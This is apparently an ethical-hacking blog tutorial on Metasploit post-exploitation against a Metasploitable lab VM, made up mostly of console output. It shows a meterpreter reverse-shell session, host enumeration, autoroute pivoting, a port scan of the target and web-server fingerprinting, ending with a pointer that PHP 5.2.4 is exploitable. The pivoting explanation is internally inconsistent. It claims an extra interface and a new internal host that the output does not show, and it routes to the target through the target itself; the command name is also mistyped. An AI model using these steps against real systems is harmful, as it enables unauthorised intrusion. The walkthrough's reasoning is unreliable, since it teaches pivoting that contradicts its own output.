msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.152:4444
[*] Sending stage (984904 bytes) to 192.168.43.120
[*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530
meterpreter >
Mumma, we got it, we got the meterpreter shell acces to the target. Lets find some interesting information using the post exploitation modules:
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
meterpreter > ifconfig
Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.
meterpreter >
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:67:67:30
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.43.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter >
Running the ifconfig command on the target, we see pretty interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems may reside. We run the arp command on the target and check if there are some systems already connected or were connected to the exploited system from the internal network, as shown in the following screenshot:
meterpreter > arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
192.168.43.152 fc:01:7c:29:00:77
meterpreter >
We can clearly see an additional system with IP address 192.168.43.120 on the internal network. Approaching the internal network, we need to set up pivoting on the exploited machine using the autoroute command.
meterpreter > run autoroute -p
[*] No routes have been added yet
meterpreter >
meterpreter > run autorotate -s 192.168.43.120 255.255.255.0
[*] Adding a route to 192.168.43.120/255.255.255.0...
[+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120
[*] Use the -p option to list all active routes
meterpreter > run autorotate -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.43.120 255.255.255.0 Session 1
meterpreter >
The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.
Let us now put the meterpreter session in the background by using the background command as follows:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info
comments
------- --- ---- ------ ----- ---- ----- ----
------
192.168.43.120 fc:01:7c:29:00:77 metasploitable Linux Server
msf6 exploit(multi/handler) >
Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) >
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
RHOSTS => 192.168.43.0
msf6 auxiliary(scanner/portscan/tcp) > run
[*] 192.168.43.0: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.43.120: - 192.168.43.120:22 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:23 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:25 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:21 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:53 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:111 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:139 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:445 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:514 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:513 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:512 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:1099 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:1524 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:2049 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:2121 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:3306 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:3632 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5432 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5900 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6000 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6200 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6667 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6697 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8009 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8180 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8787 - TCP OPEN
[*] 192.168.43.120: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >
Running the port scan module will require us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg option will globally set RHOSTS value to 192.168.43.120 and thus eliminates the need to retype the set RHOSTS command again and again.
In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > show options
Module options (auxiliary/scanner/http/http_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.43.120 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) >
Running the auxiliary module, we find that the service running on port 80 is the popular Apache 2.2.8 web server. Exploring the web, we find that the PHP version 5.2.4 is vulnerable and can allow an attacker to gain access over the target system.
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
- Hacking Truth by Kumar Atul Jaiswal